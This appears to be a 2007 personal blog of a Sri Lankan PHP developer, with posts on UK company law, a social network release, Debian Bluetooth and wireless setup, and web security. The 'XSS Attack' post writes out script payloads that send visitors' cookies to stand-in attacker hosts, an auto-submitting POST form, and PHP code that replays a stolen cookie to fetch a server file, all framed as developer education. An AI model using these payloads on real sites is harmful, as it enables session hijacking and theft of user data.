Sunday, December 09, 2007

Organizations Behaviour 09th dec 2007 class

it was a pleasure to start my BCS classes again after facing lot of personal problems for 2+ weeks. as usual i was late for my first class because the registration process took a little bit more time than i expected. todays classes were held by Dr.Dayan. even though i didnt knew him before it was a pleasure to have such a lecturer to cover the topic of Proffessional Issues in Information Systems Practice.

i have missed the first part of the syllabus which is named professional institutions. so i have to work hard and study for that part as these are all therotical it will be harder to understand these points if i dont study them now.

today the class started with the topic of ORGANIZATIONS. this was quite interesting to me as i've covered many of the topics in CIMA business law subject.

organizations can be defined as group of people working together to achieve a common goal. there are two main types of organizations,
  1. Commercial - (these type of organizations do business with a profit motivation, most of the time selling products and services)
  2. Non Commercial ( these are probably having a motivation of social and economical value. there are several types of examples available for this type of organizations)

in order to start new commercial organization in UK you have to follow the legislation of Companies Act 1985. and as in sri lanka you have to follow the New Companies Act 2007. but for non-commercial organizations in UK the approval process is still handled by queen as a tradition. but that Royal Charter State will not be given to non-commercial organizations if they dont prove their comitment beyond reasonable doubt to approving council (privy council).

under companies act of UK there are 3 types of companies that you can start.

  1. Sole Proprieter
  2. Partnerships
  3. Registered Companies

Sole Proprieter
there are not many formal documents and formal procedure in starting an sole proprieter business. but there is no seperate legal existance for this type of business, so the owner of the company is personally liable for all its liabilities.

Partnerships
Partnerships are those where couple of people start working in a group to achieve a common goal. the arrangement for this can be in written or verbal. the problem in partnerships is that all contracts should be signed by a all of the mebers in a partnership and every member is unlimitedly liable for that partnership. all most all of the commercial partnerships among people fail because sharing revenues always become a critical factor. but proffesional partnerships such as with lawyers and GPs are likely to be successful as there is no sharing of invesment or revenue in that. it is all about sharing their client base with members of that partnerships. the no of members for a partnership must be of 2-20 and when the ownership changes the law will treat it as a new partnership so all those important documents should be revised again. and every member in a partnership is having the management powers and the power to act as a agent of that partnership.

Registered Companies (limited liability)
with this type of organizations we can give a seperate legal existance for the comapany which we are starting. so in that case there will be no liability on companies owners and the management to the company it self. the maximum liability of a given shareholder for that paticular company is the money he/she have invested in that company. there are two types of companies which can be formed under registered companies.

  1. Private Limited Companies (PVT)
  2. Public Limited Companies (PLC)

Private Limited Companies
in this formation there have to be a minimum of 2 and maximum of 50 shareholders. and the ownership is decided by the no of equal shares they own. but there are some restrictions placed in private companies by its constitution.

  1. private companies cannot offer shares or debentures to public.
  2. when the ownership of shares change first it should get approved from the board of directors.
  3. maximum no of share holders cannot exceed 50.

Public Limited Companies
public limited companies dont have those three restrictions which were in private limited companies, but in a public limited company there should be a minimum of 7 shareholdes.

limit of a liablity of a shareholder towards company debts are controlled in three ways.

  1. limited by shares (shareholders liability is limited to the amount they have invested)
  2. limited by guarantee (members agree to pay a small equal amount in any case the company wound up)
  3. unlimited ( every share holder is personally liable for all company debts)

Wednesday, October 10, 2007

Poeplsenet V1.0 Released

At last we managed to get peoplesnet version 1 to be deployed in production server after doing 5 Quality Assuarance cycles. now we are awaiting the next theme from the client and once we re-theme it it will go live. :)

Features it contains include:
1. Profiles
2. Inviting Friends
3. Photo Galleries
4. Video Galleries
5. Blogs
6. RSS Feeds
7. Private Messaging
8. Address Book
9. Classifieds
10. Events
11. Forums
12. Jobs
13. Dynamic Networks
14. Content Sharing
15. Content view definable Public / Networks
16. Admin Controlled Advertisement system

Some Screen Shots:Home Page

Recent Video

My Network Graphic


Movable Task Window


Classified Listing

Thursday, August 09, 2007

How to estimate the cost of a web development project

for web development i think you should move with a fixed price for the time period. once you get the time estimation from the project manager make sure your developers / designers doesn't take more time than expected to finish a job. because this field is so competitive, you have to deliver projects on time to keep up in the business. and a good process should be defined to gather client requirements and the project spec, and you have to make sure not to adopt to any change requests from the customer till you finish the first release.

and at the same time you have to make sure that you have a sound Quality Assurance process to make sure that the deliverables are exact to the client requirements.

Thursday, June 14, 2007

filter.php

This is my newest solution on form submit data validation. it was developed in a "developer point of view" rather than "end user point of view". so if you don't have any idea about php development then you'll find it bit difficult to understand. but once you got to know the pattern u'll be loving it and of course you'll be using it to validate all your form submissions.

first we'll see what type of things do we have to validate as HTML form elements.
  • textfield
  • textarea
  • checkbox
  • radio button
  • radio group
  • List / Menu
  • file field
and with respect to all these fields what we should thoroughly take care of is not letting users submit any values containing <SCRIPT> tags, <STYLE> tags and any other undefined strings.

and one other cool feature of this script is that you can keep the default values of other elements even though one element fail to validate. and it may sounds like a very common and lazy task with javascript enabled pages but remember this snippet will validate and keep the default values nicely even without no javascript at all.

does that sounds interesting?

Monday, June 11, 2007

The Big Day Coming ahead on friday

ya it will be a big day for me becouse friday i have to conduct my first technical session to all my collegues at accura-tech. even though they have given me the title of software engineer im currently educating all other developers about new technologies.

so by friday evening i should prepare myself to conduct this technical session on user input validation. hopefully this will be the first in the row of web security which is one of my favourite topics.

i have already designed and checked the validation code which i will be using to demonstrate the impact.

i'll update this blog with a photo (if available) and the neccessary files once im done with this.

and i know that surely there will be lot of ideas coming in from our developers too. so i'll try to post it back to the blog.

--
Praveen Gunasekara

Wednesday, May 30, 2007

vote for drupal

Drupal has been selected as a finalist by the editors at CNet Webware in the first ever “Webware 100” Awards, from over 4,000 user-submitted nominations. Winners will be announced on Monday, June 18 and posted on Webware.com.

Voting is NOW OPEN, and will remain so until June 11. So please, vote for Drupal!

Vote for Drupal in the CNet Webware 100 Awards!

Monday, May 14, 2007

installing bluetooth manager on my debian laptop

i just wanted to install some kind of bluetooth connection manager in my laptop, coz i had some files to be transfered from my mobile to laptop. my laptop is a compaq presario m2000 and i'm using debian(my favourite OS) on it.

first i installed bluez-utils package.

apt-get install bluez-utils

then i conected the bluetooth dongle and ran hciconfig .

hci0: Type: USB
BD Address: 00:11:67:1D:ED:DC ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING PSCAN
RX bytes:4816991 acl:18400 sco:0 events:7524 errors:0
TX bytes:657600 acl:7361 sco:0 commands:71 errors:0


so with the previous result i knew that the dongle is recongnized and then i wanted to scan for new devices. then i turned on blutooth in my mobile phone(sony ericcson k750i).

then i executed hcitool scan and it gave me following result.

praveen-laptop:/home/praveen/Desktop/Downloads# hcitool scan
Scanning ...
00:18:13:4F:4A:61 Praveen K750i
00:03:7A:E0:9B:EE CHANDIKA
00:17:4B:D4:29:56 Chandika Nokia 6630


now it seems that i can connect into the phone. so i wanted to know
some more information about my mobile so i ran hcitool information 00:18:13:4F:4A:61 and gave me the following result.

Requesting information ...
BD Address: 00:18:13:4F:4A:61
Device Name: Praveen K750i
LMP Version: 1.2 (0x2) LMP Subversion: 0x41c
Manufacturer: Philips Semiconductors (37)
Features: 0xff 0xed 0x8d 0xf8 0x1a 0x08 0x00 0x00
<3-slot> <5-slot> ....


then i installed gnome-bluetooth debian package. so i selected tuxfamily.org to download it, so i had to update the sources.list which resides at /etc/apt/sources.list .

deb http://download.tuxfamily.org/osrdebian unstable gnome-bluetooth
deb-src http://download.tuxfamily.org/osrdebian unstable gnome-bluetooth


i added the following two lines. then i tried to update apt but it seems that you need a public key to access the newly added sources.

so then i ran

wget http://download.tuxfamily.org/osrdebian/61B8DB62.gpg -O- | sudo apt-key add -

to add the key to the apt trusted key list.

hard work is over it seems. then i ran apt-get install gnome-bluetooth in order to install gnome-bluetooth

when the install completed there was new button appearing under

applications ->accessories -> bluetooth file sharing.

when i clicked on it. the service got started and then i tried to send an image file to the laptop from my mobile and it worked.

wooow, at last.

but to send files from my laptop to mobile i still have to use the command gnome-obex-send which opens a new window asking to which device i want to send the file.

thats well done.

i'm catching up and living with linux.

Monday, April 23, 2007

XSS Attack

Cross site scripting(XSS) is relatively common problem in web application security but they are extremely dangerous. Rather than attacking the server directly they user a vulnerable web page to attack one of its users. This can lead to extreme difficulty in tracking attackers, when requests are not fully logged. Lets go in deep and find out how an vulnerable web page leads to an XSS attack? And how to make sure that there are no space left for XSS attack in the web sites we develop.

Then lets see how an XSS attack works? XSS attacks are results of flaws in server side web applications (that’s what we do…) and are rooted in user inputs which are not properly validated. For a example think about a PHP page named hello.php which is used to echo a parameter send to that file.

If you simply pass

hello.php?name=Praveen Gunasekara

Then the page will give you the expected result of printing the name. but guess what will happen if we send HTML tags on that request. For example.

hello.php?name=<ul><li>Praveen</li><li>Gunasekara</li></ul>

the input is not validated by the script before rendering by the victim’s web browser. And think about situations where we save the un-validated parameters into a database or a binary file and retrieved later to rendered on the page.

for the moment you might be wondering so what is Risk involved? think if the attacker can pass HTML tags it means he can easily pass <script> tags. then lets discuss how the attack works. as we all know we only submit data either by GET or the POST method. attacking through the GET method is the easiest and at the same time noisiest. because all most every web server logs all its URI requests.

so the simplest thing an attacker can do with javascript is to change the location of the window.

hello.php?name=<script>document.location.replace('http://attack/spam')</script>

but with the nature of XSS attacks the attacker him self cannot do any harms to other users. what he can only do is to wait till someone else connects to that page. so when someone else clicks in to this page he will be automatically redirected to some other page.

and now think about hi-jacking the user's whole session with this kind of attack. it's not harder as it sounds. what the attacker has to do is just to change the href of a particular link.

hello.php?name=<script>document.location.replace('http://attack/spam?c='%2Bdocument.cookie)</script>

so now you might say that the POST method is far more safer because the end user cannot see the parameters we are parsing from the script.

you are wrong. it is bit harder to attack on POST method. because to do that you need an intermediate web page having those parameters which are identically same to the form on the original page. for example,

<form name=f method=POST action=”http://host/hello.php”>
<input type=hidden name=”name” value=”<script>document.location.replace(‘http://attacker/payload?c=’+document.cookie)≪/script>”>
</form>
<script>f.submit()</script>


and rather than jumping the code, he might decide to change the look and feel and layout of the web page thats being attacked. but once he redirects the page to his own page there are several harmful things that can be done. for example the following code can log visitors IP, reffer and the sensitive information saved on the header.

and once the attacker has the list of IP's and cookies, he can write an automated script to connect to the IP with that session details, and to change the sensitive information there. the code below shows how to download the source code of a PHP file in the server.

<?php
$request = "GET /secret.php HTTP/1.0\r\n";
$request .= "Cookie: {$HTTP_GET_VARS['c']}\r\n";
$request .= "\r\n";
$s = fsockopen("host", 80, $errno, $errstr, 30);
fputs($s, $request);
$content = '';
while (!feof($s))
{
$content .= fgets($s, 4096);
}
fclose($s);
echo $content;
?>


and following example code shows how override a PHP file in the server.

so finally i hope everyone of us understood how dangerous XSS attacks can be and how we should write our web application with much more security capable.

Praveen Gunasekara.

My technorati profile

so today i've signed up for a new account at technorati. this is the link to my profile page.

My Technorati Profile

lets see how this going to help me out.

~Praveen Gunasekara

Friday, April 20, 2007

error handling system for web applications

managing web applications have never been so easy. the external / internal errors which occurs all the time due to DB connection failure or some other 3rd party service connection failure which are so hard to predict.

i was always been thinking about this issue. many experts suggested that we should e-mail the error with relevant information to sys administrator or someone who's responsible. but sometimes it is not so easy to do so. because most of the time the errors are reciprocal (means one error leads to another and it leads to another and the chain continues)

and by the way most of the people now use RSS feeds to get to know what is happening all over the internet rather than searching and browsing the web.

so what i was thinking about is to log all the errors in a database table rather than the plain text file. to accomplish that task in PHP you can simply use the function set_error_handler and from there define a function which can insert that specific errors details into the DB. after that we can have separate PHP file which can generate a dynamic RSS file containing the latest error messages on request and which supports some kind of authentication.

and simply from there onwards you can add that link to your favorite RSS reader, and then you can be simply informed about all those error messages which occurred within the application you provided to the customer.

and if you wish to further this error handling system you can separate FATAL errors, WARNINGS and NOTICES or a custom clarification of all the error messages.

praveen gunasekara.
"technology reinvented"

Thursday, February 22, 2007

Desktop application Vs Web Application

is this the end of the desktop applications era?

you may ask why i said so. even though i'm a PHP developer, when it comes to large scale projects i always recommended to have it as a desktop application. but now I've changed my mind. web applications was lacking one thing for sure. it was the ability to perform multiple tasks at once. but today this is totally different.

today i've dowloaded the eyeOS.
"eyeOS is an Open Source Web Desktop Environment, commonly known as Web Operating System (Web OS) or Web Office"

it was simply superb. the total file size of the source files was just 1Mb. then i extracted it to "/var/www" and then i opened an web browser and typed "localhost/eyeOS" . and there was a warning message saying that ./etc/ folder needs 777 access level. so i changed the access level and then refreshed the browser window. then it asked for the root password, and it was all.

this is eye candy. for sure.

the eyeOS seems to be the most interesting web application i've ever used. with its endless opportunities i cant even imagine what the web is going to be.

installing applications is really simple. all you need to do is download the eyeOS application from the web and open the "eyeApps" application in the eyeOS menu. and then click "install apps" button placed top-left of that window. and then just link to tar.gz file you've downloaded from the application library.

i'm going to install this in my server. so then i'll be having access to all my files at the same place and i'm getting the authority to manage all my files in one browser window.

Tuesday, February 13, 2007

setting up ur notebook's wireless network connection

Today i was configuring a new testserver for PHP5 at my office, suddenly i noticed that even though i have a wifi enabled laptop that it is not capable to login to the internet using that. i use two operating systems in my laptop "Windows XP" and "Debian". most of the time i login to the debian account. but whenever im in the office i plug the network cable to my laptop.

but due to what happened today i had to log in to the windows account, and from there i configured the wireless network. wow surprisingly it connected to our office wireless network within minutes. so then i knew that there might be something which stopped me configuring it in my Linux account.

so once again i reboot the notebook and logged in to the debian account. and there i tried to connect to office wireless network. but i found that it is not working. and then when i dmesg i found an error code looks similar to "bcm43xx: Error: Microcode "bcm43xx_microcode5.fw" not available or load failed."

and for this error i've installed the bcm43xx-fwcutter which ws a contrib package. then i thought the problem is resolved. and then i found the new network connection eth0 when i ifconfig.

bt nw when i execute "ifup eth0" it keeps saying "DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 13" and so on. and after six attempts it says "No DHCPOFFERS received. No working leases in persistent database - sleeping."

i've used a static IP to replace DHCP even though it didnt worked.

i've installed kismet-server , airsnort , linux-wlan-ng. and then i tried to airsnort scan. bt it didnt worked too.

im still finding an answer for this. i'll update this topic as soon as i get the answer.